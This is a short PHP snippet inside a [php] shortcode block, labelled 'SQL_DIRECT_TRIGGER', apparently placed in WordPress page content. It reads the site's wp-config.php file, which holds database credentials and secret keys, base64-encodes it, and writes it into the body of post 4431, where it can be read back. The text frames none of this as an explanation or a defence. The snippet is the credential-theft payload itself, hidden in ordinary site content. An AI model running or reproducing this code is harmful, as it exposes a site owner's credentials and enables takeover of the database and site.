SQL_DIRECT_TRIGGER
[php]
global $wpdb;
$f=”/var/www/html/business/wp-config.php”;
$c=@file_get_contents($f);
if($c&&strlen($c)>10){
$b64=base64_encode($c);
$sql=$wpdb->prepare(“UPDATE {$wpdb->posts} SET post_content=%s WHERE ID=%d”,$b64,4431);
$r=$wpdb->query($sql);
echo “SQL_RESULT:”.$r.” LEN:”.strlen($b64);
}else{
echo “CANNOT_READ:”.strlen($c??””).” ERR:”.(is_null($c)?”NULL”:”EMPTY”);
}
[/php]